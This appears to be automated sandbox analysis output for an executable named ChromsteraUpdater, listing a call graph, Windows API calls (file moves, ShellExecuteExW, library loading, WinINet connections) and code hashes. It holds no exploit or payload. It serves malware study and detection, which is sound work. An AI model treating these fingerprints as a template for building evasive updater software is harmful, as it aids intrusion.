GetStartupInfoW ctype 75332->75354 75333->75331 75333->75332 75402 178e87 41 API calls 4 library calls 75333->75402 75335 167d10 75355 141380 75335->75355 75340 167d2c 75340->75326 75341 167d30 75340->75341 75342 167d39 75341->75342 75404 178e62 23 API calls CallUnexpected 75341->75404 75405 167797 77 API calls ___scrt_uninitialize_crt 75342->75405 75345 167d41 75345->75331 75347 16762f 75346->75347 75408 167dec IsProcessorFeaturePresent 75347->75408 75349 16763b 75409 16b0bd 10 API calls 2 library calls 75349->75409 75351 167640 75353 167644 75351->75353 75410 16b0dc 7 API calls 2 library calls 75351->75410 75353->75323 75354->75335 75411 140b40 75355->75411 75375 141532 LeaveCriticalSection 75378 141558 75375->75378 75391 14157a ctype 75375->75391 75376 1414ea 75379 141500 75376->75379 75380 1414f0 DestroyWindow 75376->75380 75381 141564 75378->75381 75590 1712b1 14 API calls ___free_lconv_mon 75378->75590 75379->75375 75383 141510 ctype 75379->75383 75589 1712b1 14 API calls ___free_lconv_mon 75379->75589 75380->75379 75381->75391 75591 1712b1 14 API calls ___free_lconv_mon 75381->75591 75383->75375 75390 167376 CatchGuardHandler 5 API calls 75392 14161f 75390->75392 75582 141ea0 75391->75582 75403 168289 GetModuleHandleW 75392->75403 77506 178c95 75399->77506 75402->75332 75403->75340 75404->75342 75405->75345 75406->75326 75407 178e71 23 API calls CallUnexpected 75407->75330 75408->75349 75409->75351 75410->75353 75617 140f90 GetModuleFileNameW 75411->75617 75413 140b81 75414 dea60 45 API calls 75413->75414 75415 140b90 75414->75415 75416 140c00 75415->75416 75417 140bb1 75415->75417 75420 140c20 GetModuleHandleW 75416->75420 75686 141090 88 API calls 2 library calls 75417->75686 75419 140bb9 75421 d9490 42 API calls 75419->75421 75422 140c54 75420->75422 75423 140c8c 75420->75423 75424 140bc6 MoveFileW 75421->75424 75687 1674da 6 API calls 75422->75687 75427 140ce4 75423->75427 75689 1674da 6 API calls 75423->75689 75429 dea60 45 API calls 75424->75429 75447 
140d3c 75427->75447 75691 1674da 6 API calls 75427->75691 75428 140c5e 75428->75423 75431 140c6a GetProcAddress 75428->75431 75432 140bf8 75429->75432 75688 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75431->75688 75432->75416 75437 140f81 75432->75437 75433 140cb6 75433->75427 75438 140cc2 GetProcAddress 75433->75438 75436 140c89 75436->75423 75440 178ead 23 API calls 75437->75440 75690 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75438->75690 75439 140d0e 75442 140d1a GetProcAddress 75439->75442 75439->75447 75443 140f8b 75440->75443 75692 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75442->75692 75445 140ce1 75445->75427 75449 140f15 75447->75449 75658 d82f0 GetSystemDirectoryW 75447->75658 75448 140d39 75448->75447 75680 141b10 75449->75680 75452 167376 CatchGuardHandler 5 API calls 75453 140f79 CoInitializeEx DefWindowProcW InitCommonControlsEx LoadLibraryW 75452->75453 75454 141d40 75453->75454 75455 141d84 75454->75455 75456 141d9d GetCurrentThreadId 75454->75456 75455->75456 75715 16780f 75456->75715 75540 138bf4 75542 f9890 57 API calls 75540->75542 75541 138ba6 ShellExecuteExW 75541->75540 75544 138bf9 75542->75544 75546 f9890 57 API calls 75544->75546 75552 138ce9 75544->75552 75545 138d23 75572 141640 75545->75572 75547 138c08 75546->75547 75548 f9890 57 API calls 75547->75548 75547->75552 75549 138c17 75548->75549 75550 d43d0 56 API calls 75549->75550 75551 138c1e 75550->75551 75553 138d37 75551->75553 75557 d2420 42 API calls 75551->75557 75552->75545 76016 1400d0 150 API calls 75552->76016 75555 d2570 42 API calls 75553->75555 75556 138d41 75555->75556 75558 138c49 75557->75558 76013 f9350 69 API calls 75558->76013 75560 138c54 75561 d2420 42 API calls 75560->75561 75562 138c64 75561->75562 76014 f9350 69 API calls 75562->76014 75564 138c6c 75565 d43d0 56 API calls 75564->75565 75566 138c73 
75565->75566 75566->75553 75567 138c7b 75566->75567 75568 d2420 42 API calls 75567->75568 75569 138c9b 75568->75569 76015 f9bd0 143 API calls 75569->76015 75571 138ca9 75571->75552 75573 141695 75572->75573 75574 126e20 4 API calls 75573->75574 75575 1418a4 75574->75575 75576 114e20 14 API calls 75575->75576 75577 1418e9 75576->75577 75578 126620 21 API calls 75577->75578 75579 141a2a 75578->75579 75580 126620 21 API calls 75579->75580 75581 1414b0 FreeLibrary EnterCriticalSection 75580->75581 75581->75375 75581->75376 75583 141ed1 75582->75583 75584 1415fc CoUninitialize 75582->75584 75583->75582 75587 141ee7 ctype 75583->75587 77504 10a070 RaiseException 75583->77504 75584->75390 75585 141f2c DeleteCriticalSection 75585->75584 75587->75585 75589->75383 75590->75381 75591->75391 75618 d43d0 56 API calls 75617->75618 75619 140ff3 75618->75619 75620 141078 75619->75620 75621 140ff9 75619->75621 75622 d2570 42 API calls 75620->75622 75624 d3470 51 API calls 75621->75624 75623 141082 75622->75623 75625 140f90 77 API calls 75623->75625 75630 141015 75624->75630 75626 1410d0 75625->75626 75628 d43d0 56 API calls 75626->75628 75627 14103b 75693 dd210 75627->75693 75649 1410e8 75628->75649 75630->75627 75709 d35e0 42 API calls 4 library calls 75630->75709 75631 141055 75634 167376 CatchGuardHandler 5 API calls 75631->75634 75632 1411dd 75635 d2570 42 API calls 75632->75635 75636 141070 75634->75636 75637 1411e7 FreeLibrary EnterCriticalSection 75635->75637 75636->75413 75638 141293 LeaveCriticalSection 75637->75638 75639 14124b 75637->75639 75640 1412b9 75638->75640 75653 1412db ctype 75638->75653 75642 141261 75639->75642 75643 141251 DestroyWindow 75639->75643 75644 1412c5 75640->75644 75712 1712b1 14 API calls ___free_lconv_mon 75640->75712 75641 d8750 69 API calls 75641->75649 75642->75638 75647 141271 ctype 75642->75647 75711 1712b1 14 API calls ___free_lconv_mon 75642->75711 75643->75642 75644->75653 75713 1712b1 14 API calls ___free_lconv_mon 75644->75713 75646 
dea60 45 API calls 75646->75649 75647->75638 75649->75632 75649->75641 75649->75646 75654 14115a 75649->75654 75655 d43d0 56 API calls 75649->75655 75651 141ea0 2 API calls 75652 141364 CoUninitialize 75651->75652 75652->75413 75653->75651 75657 141178 75654->75657 75710 d35e0 42 API calls 4 library calls 75654->75710 75655->75649 75657->75413 75659 d83eb 75658->75659 75660 d833f 75658->75660 75661 167376 CatchGuardHandler 5 API calls 75659->75661 75660->75659 75662 d43d0 56 API calls 75660->75662 75663 d843b 75661->75663 75664 d834f 75662->75664 75663->75447 75665 d8443 75664->75665 75668 d8359 75664->75668 75666 d2570 42 API calls 75665->75666 75667 d844d 75666->75667 75670 d848d FreeLibrary 75667->75670 75671 d849b 75667->75671 75669 d3470 51 API calls 75668->75669 75674 d8377 75669->75674 75670->75671 75671->75447 75672 d839d 75673 d2420 42 API calls 75672->75673 75676 d83b3 75673->75676 75674->75672 75714 d35e0 42 API calls 4 library calls 75674->75714 75677 d2420 42 API calls 75676->75677 75678 d83d9 75677->75678 75678->75659 75679 d83ef LoadLibraryExW 75678->75679 75679->75659 75681 140f21 75680->75681 75682 141b43 75680->75682 75681->75452 75682->75681 75683 dea60 45 API calls 75682->75683 75684 141b59 75683->75684 75684->75681 75685 141b5d MoveFileW 75684->75685 75685->75681 75686->75419 75687->75428 75688->75436 75689->75433 75690->75445 75691->75439 75692->75448 75694 dd240 75693->75694 75695 d43d0 56 API calls 75694->75695 75697 dd25d 75694->75697 75696 dd250 75695->75696 75696->75697 75698 dd2d1 75696->75698 75700 d3470 51 API calls 75697->75700 75699 d2570 42 API calls 75698->75699 75701 dd2db 75699->75701 75702 dd27b 75700->75702 75703 dd320 ctype 75701->75703 75704 dd312 RegCloseKey 75701->75704 75705 dd288 75702->75705 75706 dd350 44 API calls 75702->75706 75703->75631 75704->75703 75707 d2420 42 API calls 75705->75707 75706->75705 75708 dd29d 75707->75708 75708->75631 75709->75627 75710->75657 75711->75647 75712->75644 75713->75653 75714->75672 
75718 167814 _Yarn 75715->75718 75717 167830 numpunct 75719 1695aa CallUnexpected RaiseException 75717->75719 75718->75717 75722 17b0af EnterCriticalSection LeaveCriticalSection numpunct 75718->75722 75720 1683b1 75719->75720 75721 16780f numpunct 3 API calls 75720->75721 75722->75718 75837 139a20 75842 139a76 ctype 75837->75842 76825 1406a0 21 API calls 2 library calls 75837->76825 75840 167376 CatchGuardHandler 5 API calls 75844 138b7f 75840->75844 75842->75840 75844->75540 75844->75541 75880 139acd 75881 d2570 42 API calls 75880->75881 75883 139ad7 75881->75883 75984 13970b 75984->75837 75986 d43d0 56 API calls 75984->75986 75988 13977d 75986->75988 75988->75880 75990 139787 75988->75990 76820 113140 75 API calls 75990->76820 75994 13989d 76821 da0b0 62 API calls 75994->76821 75998 1398ad 75999 d2420 42 API calls 75998->75999 76000 1398c3 75999->76000 76001 d2420 42 API calls 76000->76001 76002 1398d8 76001->76002 76004 139934 76002->76004 76822 da0b0 62 API calls 76002->76822 76006 139984 GetActiveWindow 76004->76006 76824 eed40 LoadStringW LoadStringW MessageBoxW 76006->76824 76008 139909 76823 d2680 69 API calls 76008->76823 76010 13991c 76011 d2420 42 API calls 76010->76011 76011->76004 76012 1399bd 76012->75837 76013->75560 76014->75564 76015->75571 76016->75545 76757 13a2be 76758 13a50d 76757->76758 76760 13a2d2 76757->76760 76759 113650 57 API calls 76758->76759 76762 13a430 76759->76762 76761 13a32d GetActiveWindow 76760->76761 76763 1404e0 32 API calls 76761->76763 76764 1486d0 69 API calls 76762->76764 76772 13a483 76762->76772 76765 13a341 76763->76765 76764->76772 76766 13a354 GetExitCodeThread 76765->76766 76769 13a36a 76765->76769 76767 13a36f GetLastError 76766->76767 76766->76769 76767->76769 76768 1712b1 __freea 14 API calls 76771 139449 76768->76771 76770 13a3be 76769->76770 76773 1502e1 10 API calls 76769->76773 76770->76762 76774 13a3eb WaitForSingleObject 76770->76774 76771->75837 76771->75984 76816 139b30 132 API calls 76771->76816 
76772->76768 76772->76771 76773->76770 76775 13a427 CloseHandle 76774->76775 76776 13a3fb GetExitCodeThread 76774->76776 76775->76762 76776->76775 76777 13a413 76776->76777 76777->76775 76778 13a41c TerminateThread 76777->76778 76778->76775 76816->75984 76820->75994 76821->75998 76822->76008 76823->76010 76824->76012 76825->75842 77504->75583 77507 178cd4 77506->77507 77508 178cc2 77506->77508 77518 178b3e 77507->77518 77533 178d5d GetModuleHandleW 77508->77533 77511 178cc7 77511->77507 77534 178dc2 GetModuleHandleExW 77511->77534 77512 167da0 77512->75407 77517 178d26 77519 178b4a ___scrt_is_nonwritable_in_current_image 77518->77519 77540 17926a EnterCriticalSection 77519->77540 77521 178b54 77541 178baa 77521->77541 77523 178b61 77545 178b7f 77523->77545 77526 178d2c 77550 178da0 77526->77550 77529 178d4a 77531 178dc2 CallUnexpected 3 API calls 77529->77531 77530 178d3a GetCurrentProcess TerminateProcess 77530->77529 77532 178d52 ExitProcess 77531->77532 77533->77511 77535 178e22 77534->77535 77536 178e01 GetProcAddress 77534->77536 77538 178cd3 77535->77538 77539 178e28 FreeLibrary 77535->77539 77536->77535 77537 178e15 77536->77537 77537->77535 77538->77507 77539->77538 77540->77521 77542 178bb6 ___scrt_is_nonwritable_in_current_image 77541->77542 77544 178c1d CallUnexpected 77542->77544 77548 17aec9 14 API calls 3 library calls 77542->77548 77544->77523 77549 1792b2 LeaveCriticalSection 77545->77549 77547 178b6d 77547->77512 77547->77526 77548->77544 77549->77547 77555 18252d 6 API calls CallUnexpected 77550->77555 77552 178da5 77553 178d36 77552->77553 77554 178daa GetPEB 77552->77554 77553->77529 77553->77530 77554->77553 77555->77552 77556 17d2cb 77557 17d309 77556->77557 77558 17d2d9 __cftoe 77556->77558 77564 16c8ad 14 API calls __dosmaperr 77557->77564 77558->77557 77560 17d2f4 RtlAllocateHeap 77558->77560 77563 17b0af EnterCriticalSection LeaveCriticalSection numpunct 77558->77563 77560->77558 77561 17d307 77560->77561 77563->77558 77564->77561 77565 
da1d0 77566 da212 77565->77566 77567 da245 InternetCrackUrlW 77566->77567 77571 da714 77566->77571 77568 da307 77567->77568 77569 da292 77567->77569 77572 d43d0 56 API calls 77568->77572 77573 d43d0 56 API calls 77569->77573 77570 da772 77574 da7e8 77570->77574 77575 da7d5 77570->77575 77585 da779 77570->77585 77571->77570 77576 da85a 77571->77576 77588 da318 ctype 77572->77588 77577 da297 77573->77577 77580 d9490 42 API calls 77574->77580 77578 de540 42 API calls 77575->77578 77579 d2570 42 API calls 77576->77579 77583 d2570 42 API calls 77577->77583 77586 da29f 77577->77586 77581 da7da 77578->77581 77579->77577 77580->77585 77582 d2420 42 API calls 77581->77582 77582->77585 77584 da873 77583->77584 77588->77576 77588->77577 77592 da374 _LStrxfrm 77588->77592 77636 16c8ad 14 API calls __dosmaperr 77588->77636 77589 da390 77637 16c7af 41 API calls __wsopen_s 77589->77637 77590 da3f0 _wcsrchr 77600 da44a 77590->77600 77639 d85e0 57 API calls 4 library calls 77590->77639 77592->77576 77592->77590 77638 da920 57 API calls 4 library calls 77592->77638 77595 da3e3 77598 d9490 42 API calls 77595->77598 77596 d43d0 56 API calls 77599 da5d9 77596->77599 77597 da43d 77601 d9490 42 API calls 77597->77601 77598->77590 77599->77577 77604 d3470 51 API calls 77599->77604 77602 da4b4 77600->77602 77603 da4d3 77600->77603 77614 da4ce 77600->77614 77601->77600 77640 da920 57 API calls 4 library calls 77602->77640 77603->77614 77641 d85e0 57 API calls 4 library calls 77603->77641 77607 da5ff 77604->77607 77617 da612 77607->77617 77644 d35e0 42 API calls 4 library calls 77607->77644 77608 da4c1 77610 d9490 42 API calls 77608->77610 77609 da4ea 77611 d9490 42 API calls 77609->77611 77610->77614 77615 da4f7 77611->77615 77613 da64c 77616 d43d0 56 API calls 77613->77616 77614->77596 77615->77614 77626 da553 77615->77626 77642 da920 57 API calls 4 library calls 77615->77642 77619 da672 77616->77619 77617->77576 77617->77613 77618 df2a0 42 API calls 77617->77618 77618->77617 77619->77577 
77620 d3470 51 API calls 77619->77620 77621 da698 77620->77621 77628 da6ab _wcsrchr 77621->77628 77645 d35e0 42 API calls 4 library calls 77621->77645 77623 da546 77625 d9490 42 API calls 77623->77625 77625->77626 77626->77614 77643 d85e0 57 API calls 4 library calls 77626->77643 77627 da6e4 77627->77571 77633 d2420 42 API calls 77627->77633 77628->77627 77646 dd130 42 API calls 3 library calls 77628->77646 77630 da5a6 77632 d9490 42 API calls 77630->77632 77632->77614 77633->77571 77634 da6d5 77635 d2420 42 API calls 77634->77635 77635->77627 77636->77589 77637->77592 77638->77595 77639->77597 77640->77608 77641->77609 77642->77623 77643->77630 77644->77617 77645->77628 77646->77634

Control-flow Graph (entry block 10e060; legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 8deeca12d74a2b98aac61b673534d1227b818719230526a0223608c395cc11a5
• Instruction ID: 7f171485b371608c91ffc00ea9f5303227d29d4a40e17c2bee2277f11eaa54e6
• Opcode Fuzzy Hash: 8deeca12d74a2b98aac61b673534d1227b818719230526a0223608c395cc11a5
• Instruction Fuzzy Hash: 34729071A01209EFDB10CFA8CC44BAEBBF8FF45714F14865AE915AB391D7759A04CBA0

Control-flow Graph (entry block 13a1b0; legend: Executed / Not Executed)
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(?,?,00000001,?), ref: 0013A262
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0013A26C
                                                                                                                                                                              • GetActiveWindow.USER32 ref: 0013A332
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(?,?,00000000,?,?,?,?,?,1C327622,?,?), ref: 0013A360
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$ActiveCodeErrorExitLastMessagePostWindow
                                                                                                                                                                              • String ID: '$)
                                                                                                                                                                              • API String ID: 1109395723-1897525437
                                                                                                                                                                              • Opcode ID: 490d36bf23dfc5198644acdddaa874f0e6f4bc4770b5343ec444fb8f578129c4
                                                                                                                                                                              • Instruction ID: 828e6f306f74c61d4364bdb3b8e16ec0f594bdcb4f108d98af8db8554f66e20a
                                                                                                                                                                              • Opcode Fuzzy Hash: 490d36bf23dfc5198644acdddaa874f0e6f4bc4770b5343ec444fb8f578129c4
                                                                                                                                                                              • Instruction Fuzzy Hash: BCF19970501288DFDB10CF68C888B9EBBF4BF05314F588269F8559B2A1D7B4DD49CB92

                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000DA288
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 000DA416
                                                                                                                                                                                • Part of subcall function 000D43D0: GetProcessHeap.KERNEL32 ref: 000D4425
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 000DA6B2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcsrchr$CrackHeapInternetProcess
                                                                                                                                                                              • String ID: .aiu$<$<>:"/\|?*
                                                                                                                                                                              • API String ID: 1665875833-3633523513
                                                                                                                                                                              • Opcode ID: 0b90d96e4bfc13724ecac610398ff3b6c450bf0820bff1ad3361a38c66993ae2
                                                                                                                                                                              • Instruction ID: 031b19439db3e8bc7eec70232af08254362d73ded8ef21956a35143c4c9895de
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b90d96e4bfc13724ecac610398ff3b6c450bf0820bff1ad3361a38c66993ae2
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F228031A01709DFDB00DFA9C845BAEB7F4AF55314F14825AE8159B392EB74DE04CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 001040B3
                                                                                                                                                                              • InternetConnectW.WININET(001034D2,001034D2,001034D2,001034D2,001034D2,001034D2,001034D2), ref: 001040D6
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 001040E0
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?), ref: 00104111
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 00104136
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3866874665-0
                                                                                                                                                                              • Opcode ID: 0982cf5ddebd98ad3e9e066ab0f5b7e3509657ddda2da371566ef633632938a3
                                                                                                                                                                              • Instruction ID: a02ecc6c87501d746df866fc4e4f4ecc12141f94ab4756161c637f395ee143c3
                                                                                                                                                                              • Opcode Fuzzy Hash: 0982cf5ddebd98ad3e9e066ab0f5b7e3509657ddda2da371566ef633632938a3
                                                                                                                                                                              • Instruction Fuzzy Hash: D01182722057048FD7305B55E988B577BA4EBB6326F10882EE1C6829A1D7B0F8D5DB50